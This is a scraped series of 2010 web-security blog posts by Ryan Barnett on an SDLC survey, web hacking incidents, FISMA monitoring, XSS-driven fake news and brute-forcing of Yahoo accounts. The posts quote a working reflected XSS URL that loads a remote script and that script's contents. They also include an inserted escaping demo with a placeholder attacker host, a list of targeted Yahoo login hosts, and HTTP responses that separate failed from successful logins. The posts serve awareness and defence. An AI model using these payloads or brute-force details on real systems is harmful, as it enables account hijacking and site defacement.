<br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The results of an interesting survey were recently released by Errata Security, entitled </span></span><a href="http://www.erratasec.com/ErrataSurveyResults.pdf"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="color:#000000;"><span class="Apple-style-span" style="font-size: small;">Integrating Security Into the Software Development Lifecycle</span></span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">. The survey was gathered during the recent RSA and Security B-Sides conferences in San Francisco and focused on attendees who worked at software companies. There were a number of interesting perspectives on the levels of success, or lack thereof, of attempting to implement a software development life cycle (SDLC) within an organization. Here is the most telling takeaway from a </span></span><a href="http://www.darkreading.com/shared/printableArticle.jhtml?articleID=224200945"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="color:#000000;"><span class="Apple-style-span" style="font-size: small;">DarkReading</span></span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"> story on the survey results: </span></span></div><blockquote><p><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Microsoft's SDL was the most popular tool for secure software development methods, with Microsoft SDL Agile at number two, with 35 percent of the respondents using Agile SDL, most of which were small development firms and several large companies in the survey. 
"The survey showed a big win for Microsoft's awareness program, but what I hope that Microsoft will learn from this is that small- to medium-sized software companies have different needs than the big guys. SDL-Agile is a good start, but now they need to re-evaluate the resource requirements with small company in mind," says Marisa Fagan, security project manager at Errata Security.</span></span></i></p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_E0YEPhKPc2k/S7pDVHMMA5I/AAAAAAAAAGo/v6sPL-cKras/s1600/reasons_for_not_adopting.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 138px;" src="http://1.bp.blogspot.com/_E0YEPhKPc2k/S7pDVHMMA5I/AAAAAAAAAGo/v6sPL-cKras/s400/reasons_for_not_adopting.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5456747928499258258" /></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">
<br />
<br /></span></span><div><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Fagan says among those companies not deploying a secure coding program, the main reason was a lack of resources.</span></span><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"> "No matter what the size of the company, participants said it was too time consuming, too expensive, and too draining on their resources," she says</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">. "Another reason was that management had deemed it unnecessary...The survey showed that developers look to management to set the security agenda, and are generally not self-starters when it comes to including security in their code."</span></span></i></div></blockquote><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">This is a key issue that organizations are facing, especially small- to medium-sized ones. Here is a comment from a survey participant that echoes this same sentiment:</span></span></div><div><blockquote><i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Planning to move security further "left" in the cycle. Unfortunately, my executive management is more concerned with getting a product out the door than getting a secure product out the door. Until that changes, I don't know how successful I can be...</span></span></i></blockquote></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">I have seen this issue firsthand. 
If upper management does not fully comprehend the impact of poor software security, then throwing process and technology at the problem won't help. C-level executives need guidelines so that they can make informed decisions about the possible consequences of producing insecure code. </span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Last Wednesday an interesting report was released called "</span><a href="http://webstore.ansi.org/cybersecurity.aspx"><span class="Apple-style-span" style="color:#000000;"><span class="Apple-style-span" style="font-size: small;">The Financial Management of Cyber Risk: An Implementation Framework for CFOs</span></span></a><span class="Apple-style-span" style="font-size: small;">", and it is highly recommended that management read it. Please pass this along.</span></span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-79048658461696642352010-04-05T10:13:00.002-04:002010-04-05T10:27:46.153-04:00Weekly Round-Up of Web Hacking Incident Database (WHID) Events (March 29th - April 5th)<div><i>Submitted by Ryan Barnett 04/05/2010</i></div><div><br /></div><div><div>The <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">Web Hacking Incidents Database</a>, or WHID for short, is a <a href="http://www.webappsec.org">Web Application Security Consortium</a> project dedicated to maintaining a list of web application security incidents. 
WHID's goal is to serve as a tool for raising awareness of the web application security problem and to provide information for statistical analysis of web application security incidents.</div><div><br /></div><div>The following incidents were added to WHID last week:</div><div><br /></div><div>WHID 2010-46: Microsoft's Larry "Major Nelson" Hryb has online account hijacked through Xbox.com as part of underground group's publicity bid.</div><div><a href="http://www.gamespot.com/news/6254330.html">http://www.gamespot.com/news/6254330.html</a></div><div><br /></div><div>WHID 2010-47: Court papers: JC Penney was hacking victim</div><div><a href="http://www.msnbc.msn.com/id/36088614/ns/technology_and_science-security/">http://www.msnbc.msn.com/id/36088614/ns/technology_and_science-security/</a></div><div><br /></div><div>WHID 2010-48: Hackers brute force their way into galeton.com website containing names, credit card numbers</div><div><a href="http://datalossdb.org/incidents/2692-hackers-brute-force-their-way-into-website-containing-names-credit-card-numbers">http://datalossdb.org/incidents/2692-hackers-brute-force-their-way-into-website-containing-names-credit-card-numbers</a></div><div><br /></div><div>WHID 2010-49: Hackers pluck 8,300 customer logins from bank server</div><div><a href="http://www.theregister.co.uk/2010/01/12/bank_server_breached/">http://www.theregister.co.uk/2010/01/12/bank_server_breached/</a></div><div><br /></div><div>WHID 2010-50: Shared-password vulnerability may have exposed personal information in online account management system</div><div><a href="http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034">http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034</a></div><div><br /></div><div>WHID 2010-51: Woman worms into D.C. 
taxpayer accounts</div><div><a href="http://www.washingtonexaminer.com/local/Woman-worms-into-D_C_-taxpayer-accounts-83589257.html">http://www.washingtonexaminer.com/local/Woman-worms-into-D_C_-taxpayer-accounts-83589257.html</a></div><div><br /></div><div>WHID 2010-52: 3000 Small Dog Electronics customers' credit card details compromised</div><div><a href="http://www.infosecurity-us.com/view/7411/3000-small-dog-electronics-customers-credit-card-details-compromised/">http://www.infosecurity-us.com/view/7411/3000-small-dog-electronics-customers-credit-card-details-compromised/</a></div><div><br /></div><div>WHID 2010-53: Google says Vietnam political blogs hacked</div><div><a href="http://news.yahoo.com/s/afp/20100331/tc_afp/vietnammediainternetrightsgooglemcafee&a=Technology News&x=1">http://news.yahoo.com/s/afp/20100331/tc_afp/vietnammediainternetrightsgooglemcafee&a=Technology News&x=1</a></div><div><br /></div><div>WHID 2010-54: MyPilotStore.com hack results in false charges on customers’ cards</div><div><a href="http://www.databreaches.net/?p=10990">http://www.databreaches.net/?p=10990</a></div><div><br /></div><div>WHID 2010-55: Drudge Report accused of serving malware, again</div><div><a href="http://news.cnet.com/8301-27080_3-10466044-245.html">http://news.cnet.com/8301-27080_3-10466044-245.html</a></div><div><br /></div><div>WHID 2010-56: Facebook Flub Leaks Private E-Mail Addresses</div><div><a href="http://www.cio.com/article/589021/Facebook_Flub_Leaks_Private_E_Mail_Addresses">http://www.cio.com/article/589021/Facebook_Flub_Leaks_Private_E_Mail_Addresses</a></div><div><br /></div><div>WHID 2010-57: Web security under attack from ads in prominent advertising programs</div><div><a href="http://www.mxlogic.com/securitynews/web-security/web-security-under-attack-from-ads-in-prominent-advertising-programs651.cfm">http://www.mxlogic.com/securitynews/web-security/web-security-under-attack-from-ads-in-prominent-advertising-programs651.cfm</a></div><div><br 
/></div><div>WHID 2010-58: China journalist club shuts website after attack</div><div><a href="http://www.reuters.com/assets/print?aid=USTOE63101R20100402">http://www.reuters.com/assets/print?aid=USTOE63101R20100402</a></div></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-57118292850135925752010-04-01T09:46:00.004-04:002010-04-01T10:52:39.019-04:00Content Spoofing - Not Just An April Fool's Day Attack<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_E0YEPhKPc2k/S7SowmEHBgI/AAAAAAAAAGY/R_B9b2mkBl4/s1600/fake_news.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 263px;" src="http://4.bp.blogspot.com/_E0YEPhKPc2k/S7SowmEHBgI/AAAAAAAAAGY/R_B9b2mkBl4/s400/fake_news.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5455170601457485314" /></a><br /><i>Submitted by Ryan Barnett 04/01/2010</i><div><i><br /></i></div><div>Happy April Fool's Day, everyone! April 1st is traditionally a day for pranks, and there is no doubt in my mind that we will all be flooded with all sorts of <a href="http://projects.webappsec.org/Content-Spoofing">Content Spoofing</a> fake news stories, such as the one in the graphic on the right from the CBS News website, whose headline read:</div><div><blockquote><b><i>George Bush appoints a 9 year old to be the chairperson of the Information Security Department.</i></b></blockquote></div><div>How are these attacks carried out? More often than not, attackers leverage reflected <a href="http://projects.webappsec.org/Cross-Site+Scripting">Cross-site Scripting</a> vulnerabilities within news outlets' web applications so that if victims click on crafted web links, the spoofed data will appear. 
Here is what the XSS link looked like:</div><i><blockquote>http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1<b>--%3E%3Cscript%20src=http://www.securitylab. ru/test/sc.js%3E%3C/script%3E%3C!--</b></blockquote></i><div>When the user sent this request to the website, the JavaScript payload executed within the victim's browser and requested the sc.js file from the remote, hacker-owned website. The contents of the sc.js file were:</div><i><blockquote>document.write('&lt;p align=left&gt;Mon, 28 August 2006');<br />document.write('&lt;p align=center&gt;&lt;b&gt;George Bush appoints a 9year old to be the chairperson… ');<br />document.write('&lt;p&gt;On Friday night, George Bush made... ');<br />document.write('&lt;p&gt;Michael Antipov was noticed by the FBI... ');<br />document.write('&lt;p&gt;Michael Antipov, sun of the top-secret... ');<br />document.write('&lt;p&gt;From now on the citizens of the USA can... ');</blockquote></i><div>Cross-site Scripting vulnerabilities are found in just about every web application, so the CBS News site example here is not unique. 
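</div><div>As an added example, not code from the original post or from CBS News, here is a small JavaScript model of a page that reflects a zipcode parameter: renderVulnerable() echoes it raw, so the decoded payload above terminates the HTML comment and injects a script tag, while renderSafe() HTML-escapes it and the same value comes out as inert text. That the site echoed the value inside an HTML comment is an inference from the payload's leading --%3E; the template, function names and the attacker.example placeholder host are assumptions.</div>

```javascript
// Added example, not code from the original post or from cbsnews.com.
// The URL quoted above ends the HTML comment the site wrote the zipcode
// into (the "--%3E" prefix), injects a script tag, and then reopens a
// comment to swallow the rest of the page.  This small model reproduces
// that context and shows what output encoding changes.  The template,
// function names and the attacker.example host are assumptions.

// Replace the characters that can change HTML context with entities.
// Both "-->" and "--!>" end a comment, and each contains ">", so an
// escaped value can never terminate the comment early.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the parameter is written into the page as raw markup.
function renderVulnerable(zipcode) {
  return `<!-- zipcode: ${zipcode} --><p>Local weather</p>`;
}

// Hardened: same template, value encoded for the HTML context it lands in.
function renderSafe(zipcode) {
  return `<!-- zipcode: ${escapeHtml(zipcode)} --><p>Local weather</p>`;
}

// Check a rendered page for script tags that load an external source and
// return their src values.  A regex is enough for this demo; use a real
// HTML parser for anything production-facing.
function findScriptSources(html) {
  const re = /<(script)\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const sources = [];
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[2]);
  return sources;
}

// Constructed input: the decoded form of the zipcode value shown above, with
// the remote host replaced by a placeholder.  Built by concatenation so the
// source file itself never contains a literal comment opener.
const PAYLOAD = '1-->' +
  '<script src=http://attacker.example/sc.js></script>' +
  '<' + '!--';

// Render both versions and report what an inspector of the HTML would see.
function demo() {
  const vulnerable = renderVulnerable(PAYLOAD);
  const safe = renderSafe(PAYLOAD);
  return {
    vulnerableScripts: findScriptSources(vulnerable), // ['http://attacker.example/sc.js']
    safeScripts: findScriptSources(safe),             // []
    // The escaped value stays inside the comment the template opened.
    safeStaysInComment: safe.includes('zipcode: 1--&gt;&lt;script'),
  };
}
```

<div>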
The <a href="http://xssed.com/search?key=news">XSSed website</a> lists a number of other news outlet sites vulnerable to this type of attack.</div><div>Keep in mind that XSS vulnerabilities can be leveraged to achieve many different attack outcomes. In this case, we are talking about Content Spoofing of news stories; however, an attacker may also use the same attack vectors to try to install malware onto victims' computers.</div><div><br /></div><div>Besides XSS vulnerabilities, Content Spoofing attacks can also be carried out through unauthorized access to web-based management interfaces. For example, there have been news stories of improperly configured proxy servers that allowed external clients to gain access to the internal network. This in turn gave them access to web-based news submission applications. This is exactly what happened when <a href="http://www.zdnet.co.uk/news/networking/2002/07/15/usa-today-investigating-hack-attack-2119086/">hacker Adrian Lamo posted fake news stories</a> on Yahoo's website.</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-87000097237738240672010-03-31T10:19:00.003-04:002010-03-31T11:34:53.702-04:00Hijacking Yahoo Email Accounts Update<i>Submitted by Ryan Barnett 03/31/2010</i><div><br /></div><div>There have been recent news reports of <a href="http://www.nytimes.com/2010/03/31/world/asia/31china.html">journalists' Yahoo email accounts being hacked</a>. 
Andrew Jacobs of the New York Times reports:</div><div><blockquote><p><i>In what appears to be a coordinated assault, the e-mail accounts of more than a dozen rights activists, academics and journalists who cover China have been compromised by unknown intruders. A Chinese human rights organization also said that hackers disabled its Web site for a fifth straight day. </i></p> <p><i> The infiltrations, which involved Yahoo e-mail accounts, appeared to be aimed at people who write about China and Taiwan, rendering their accounts inaccessible, according to those who were affected. In the case of this reporter, hackers altered e-mail settings so that all correspondence was surreptitiously forwarded to another e-mail address.</i></p></blockquote><p>So, how were these Yahoo email accounts broken into? The news article provides a possible scenario:</p><blockquote><i>Paul Wood, a senior analyst at the Symantec Corporation, said a growing number of malignant viruses were tailored to specific recipients, with the goal of tricking them into opening attachments that would insert malware onto their computers. Mr. Wood said his company, which designs anti-virus software, now blocks about 60 such attacks each day, up from 1 or 2 a week in 2005. “They’re very well crafted and extremely damaging,” he said.</i></blockquote><p>Targeted malware may very well have been the attack vector here; however, I can't help but also think about the <a href="http://tacticalwebappsec.blogspot.com/2009/09/distributed-brute-force-attacks-against.html">Distributed Brute Force Attacks</a> that we are seeing against Yahoo accounts through the <a href="http://projects.webappsec.org/Distributed-Open-Proxy-Honeypots">WASC Distributed Open Proxy Honeypot Project</a>. Brute forcing login credentials is still quite an effective means of hijacking accounts. 
As I outlined in the other blog post, attackers have found that they can target a web services URL to conduct their attacks without running into restrictions such as CAPTCHAs. </p><p>In addition to the web service authentication URLs, we are now also seeing attackers target mobile (WAP) authentication services. Here are some of the different mobile Yahoo subdomains being targeted:<br /></p><blockquote><p><i>in.wap.yahoo.com</i></p><p><i>mlogin2.mobile.re4.yahoo.com</i></p><p><i>mobile1.login.vip.sp2.yahoo.com</i></p><p><i>my.rf.wap.yahoo.com</i></p><p><i>ph.wap.yahoo.com</i></p><p><i>sushi2.mobile.ch1.yahoo.com</i></p><p><i>webgw1.mobile.re3.yahoo.com</i></p><p><i>webgw3.mobile.re3.yahoo.com</i></p></blockquote><div>When a client sends credentials and the authentication attempt fails, the response looks like this:</div><blockquote><p><i><span class="Apple-style-span" style="font-family:'courier new';">HTTP/1.1 302 Found</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Date: Wed, 31 Mar 2010 14:49:03 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Expires: Mon, 26 Jul 1997 05:00:00 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Cache-Control: private, no-store, no-cache, must-revalidate</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Set-Cookie: B=emj89nt5r6o6v&b=3&s=lo; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com</span></i></p><p><i><b><span class="Apple-style-span" style="font-family:'courier new';">Location: 
/p/login?.done=/p/&.pc=5135&.error=7&ignore=signin&ySiD=32CzS0e2khOZCLqXwuFj</span></b></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Connection: close</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Transfer-Encoding: chunked</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Content-Type: text/html; charset=utf-8</span></i></p><div><i><span class="Apple-style-span" style="font-family:'courier new';"><!-- sushi21.mobile.sp1.yahoo.com uncompressed/chunked Wed Mar 31 14:49:03 GMT 2010 --></span></i></div></blockquote><p>Notice that the Location header sends the user back to the login URL with parameters indicating that there was an error. In contrast, when authentication succeeds, the user is redirected to a different URL:</p><blockquote><p><i><span class="Apple-style-span" style="font-family:'courier new';">HTTP/1.1 302 Found</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Date: Wed, 31 Mar 2010 14:48:46 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Expires: Mon, 26 Jul 1997 05:00:00 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Cache-Control: private, no-store, no-cache, must-revalidate</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Set-Cookie: 
B=derbda55r6o6e&b=3&s=ml; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b>Location: /p/?.data=LnlpZCUzZFU4ZjZDNWZRZ25vb2VkX19lZy0tJTI2Lnl0cyUzZDIw</b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b>MTAwMzMxMTQ0ODQ3JTI2LnlndCUzZEhlbGxvIEh1Z2glMjYueWludGwlM2R1cy</b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b>UyNi55Y28lM2R1cyUyNi55ZW0lM2RkYXZpc19odWdoQHlhaG9vLmNvbSUyNi55<span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><span class="Apple-style-span" style="font-family:'courier new';"><b>eW0lM2RkYXZpc19odWdoQHlhaG9vLmNvbSUyNi55bm0lM2RIdWdoIERhdmlzJTI</b></span></i></span></b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b><span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><span class="Apple-style-span" style="font-family:'courier new';"><b>2LnloaWQlM2RkYXZpc19odWdoJTI2LnlyZWclM2QxMDY1NzA0NDc4&.ys=XkVVQ</b></span></i></span></b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b><span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><span class="Apple-style-span" style="font-family:'courier new';"><b>zpv_oOsltCTiJwm3.c9zrQ-&ySiD=zmCzS9GqZrL1pVcmUygz</b></span></i></span></b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Connection: close</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Transfer-Encoding: chunked</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Content-Type: text/html; charset=utf-8</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><!-- 
sushi20.mobile.sp1.yahoo.com uncompressed/chunked Wed Mar 31 14:48:46 GMT 2010 --></span></i></p></blockquote><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i463.photobucket.com/albums/qq358/zlz_yeumaingannam_zlz/2bcycn7ddd8xsmb2dcid.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 232px; height: 520px;" src="http://i463.photobucket.com/albums/qq358/zlz_yeumaingannam_zlz/2bcycn7ddd8xsmb2dcid.jpg" border="0" alt="" /></a><br /><p>It is interesting to note that the hacker underground keeps track of all of these different authentication servers and of the various authentication mechanisms in use. Just do a Google search for "<a href="http://www.google.com/search?hl=en&q=%22yahoo+servers+for+cracking%22&aq=f&aqi=&aql=&oq=&gs_rfai=">Yahoo Servers for cracking</a>" and you will get a long list of user forums where hackers list both Yahoo authentication hosts and automated brute-forcing tools (such as the one shown on the right).</p><p>The lesson learned from this data is that there are many ways in which attackers may be able to hijack users' email accounts. For organizations attempting to defend against these types of attacks, it is critical that every authentication mechanism is identified and that proper access control is implemented for each one (specifically, whether end users are allowed to interact with it directly or whether it is supposed to be used only by other authorized partners).</p></div><div><br /></div><div><br /></div><div><br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-48028137734473866652010-03-30T09:02:00.002-04:002010-03-30T09:24:03.108-04:00WASC Web Hacking Incident Database Project Update<i>Submitted by Ryan Barnett 03/30/2010</i><div><br /></div><div><div>I wanted to share some exciting news with everyone. 
I have taken over as the Project Leader for the <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database (WHID) Project</a>. First of all, I want to thank <a href="http://www.xiom.com/about/shezaf">Ofer Shezaf</a> for starting WHID and for all of the great work he has done with it. It is a tremendous resource for real-world web application security awareness, as it helps to prioritize the attacks and vulnerabilities that are currently being used by cyber-criminals to compromise sites. I am excited to keep it going and to hopefully increase its value to the community.</div><div><br /></div><div><b>Changes to WHID</b></div><div><ol><li>The WHID data has been uploaded to a new <a href="http://wasc-whid.dabbledb.com/publish/wasc-whid/7dedeab9-de3d-477b-8dde-c7cd58946c13/defaultwhidview.html">DabbleDB account</a>, which will allow for multiple WHID authors. If you would like to participate in this capacity, please let me know and I will get you set up.</li><li>The project page has been updated to embed the DabbleDB data, with search filters, into the existing WHID Project page. This makes searching and filtering much easier. You can also access it directly <a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd">here</a>.</li><li>We also added an <b><i><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/mWTwXOqA">Incident Entry Submittal Form</a></i></b> directly on the page so it will be easier for the community to send in links to web hack stories. 
This will then place the link in a queue and email me for a follow-up.</li><li>Lastly, we also added a new <a href="http://wasc-whid.dabbledb.com/publish/wasc-whid/7dedeab9-de3d-477b-8dde-c7cd58946c13/defaultwhidview.rss">RSS feed</a> and <a href="http://twitter.com/wascwhid">Twitter account</a> so you can keep track of WHID entries as they happen.</li></ol></div><div>If you have any comments about WHID or recommendations for making it more useful, please let me know.</div><div><br /></div></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-81275492395295470552010-03-29T08:09:00.010-04:002010-03-30T12:15:19.689-04:00Continuous Monitoring Highlighted in Recommended FISMA Changes<i>Submitted by Ryan Barnett 03/29/2010</i><div><br /></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">The SANS </span><span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="Apple-style-span" style="font-size: medium;">Institute's</span></span><span class="Apple-style-span" style="font-size: medium;"> weekly </span></span><a href="http://www.sans.org/newsletters/newsbites/newsbites.php?vol=12&issue=24#sID200"><span class="Apple-style-span" style="font-family:arial;"><span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="Apple-style-span" style="font-size: medium;">NewsBites</span></span><span class="Apple-style-span" style="font-size: medium;"> newsletter covered an important story</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> last week with regards to proposed changes to the </span></span><em style="font-style: normal; "><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Federal Information Security Management Act</span></span></em><span 
class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> (</span></span><em style="font-style: normal; "><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">FISMA</span></span></em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">), which were presented at a House subcommittee hearing on March 24. The most important change is a shift toward a more agile, real-time monitoring capability. Alan Paller, Director of Research at the SANS Institute, </span><a href="http://oversight.house.gov/images/stories/Hearings/Government_Management/032410_Federal_Info_Security/Testimony_of_Alan_Paller_March_24_2010.pdf"><span class="Apple-style-span" style="font-size: medium;">stated the following in his testimony</span></a><span class="Apple-style-span" style="font-size: medium;">:</span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><blockquote><div><i><span class="Apple-style-span" style="font-size: medium;">One of the most important goals of any federal cyber security legislation must be to enable the defenders to act as quickly to protect their systems as the attackers can act. <b>We call this continuous monitoring and it is single handedly the most important element you will write into the new law</b>. Continuous monitoring enables government agencies to respond quickly and effectively to common and new attack vectors. The Department of State has demonstrated the effectiveness of this security innovation. Most major corporations use it. This model is the future of federal cyber security. As our response to attacks becomes faster and more automated, we will take the first steps toward turning the tide in cyberspace, and protecting our sensitive information.</span></i></div></blockquote><div><span class="Apple-style-span" style="font-family:Georgia, serif;"><span class="Apple-style-span" style="font-size: medium;"><br /></span><a href="http://1.bp.blogspot.com/_Z-tqVTd9fPI/SgMCAxX0VaI/AAAAAAAABUI/Ww-5b34gjgw/s400/verizon_2009_dbir_timespan.jpg"><img src="http://1.bp.blogspot.com/_Z-tqVTd9fPI/SgMCAxX0VaI/AAAAAAAABUI/Ww-5b34gjgw/s400/verizon_2009_dbir_timespan.jpg" border="0" alt="" style="float: right; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 10px; cursor: pointer; width: 400px; height: 311px; " /></a><span class="Apple-style-span" style="font-size: medium;"><br /><br /></span><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Continuous monitoring capabilities, for the commercial sector as well as for government, are absolutely critical for identifying attempted and actual compromises and for conducting proper incident response. Proper real-time network security monitoring is woefully lacking, a claim supported by the Verizon 2009 Data Breach Investigations Report, which found that "<b><i>Breaches still go undiscovered and uncontained for weeks or months in 75 percent of cases.</i></b>" This is mainly due to a lack of proper real-time continuous monitoring of network traffic.</span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Breach Security has seen these issues first hand with our government customers who want to protect their web applications. They lack real-time visibility into their web data streams and are unaware of who is attacking them, how they are doing it, and if and when they are successful. Web application firewalls give them the visibility they need and the situational awareness required to identify and respond to attacks in real time. </span></span></div></span></div><div><span class="Apple-style-span" style="font-size: medium;"><br /></span></div><div><span class="Apple-style-span" style="font-size: medium;">Mr. 
</span><span class="blsp-spelling-error" id="SPELLING_ERROR_9"><span class="Apple-style-span" style="font-size: medium;">Paller</span></span><span class="Apple-style-span" style="font-size: medium;"> also recommends the use of the </span><a href="http://www.sans.org/critical-security-controls/"><span class="Apple-style-span" style="font-size: medium;">Consensus Audit Guidelines (</span><span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="Apple-style-span" style="font-size: medium;">CAG</span></span><span class="Apple-style-span" style="font-size: medium;">)</span></a><span class="Apple-style-span" style="font-size: medium;"> as created by the Center for Strategic and International Studies (members of the Consortium include NSA, US Cert, </span><span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="Apple-style-span" style="font-size: medium;">DoD</span></span><span class="Apple-style-span" style="font-size: medium;"> </span><span class="blsp-spelling-error" id="SPELLING_ERROR_12"><span class="Apple-style-span" style="font-size: medium;">JTF</span></span><span class="Apple-style-span" style="font-size: medium;">-</span><span class="blsp-spelling-error" id="SPELLING_ERROR_13"><span class="Apple-style-span" style="font-size: medium;">GNO</span></span><span class="Apple-style-span" style="font-size: medium;">, the Department of Energy Nuclear Laboratories, Department of State, </span><span class="blsp-spelling-error" id="SPELLING_ERROR_14"><span class="Apple-style-span" style="font-size: medium;">DoD</span></span><span class="Apple-style-span" style="font-size: medium;"> </span><span class="blsp-spelling-error" id="SPELLING_ERROR_15"><span class="Apple-style-span" style="font-size: medium;">Cyber</span></span><span class="Apple-style-span" style="font-size: medium;"> Crime Center plus the top commercial forensics experts and pen testers that serve the banking and critical infrastructure communities). Mr. 
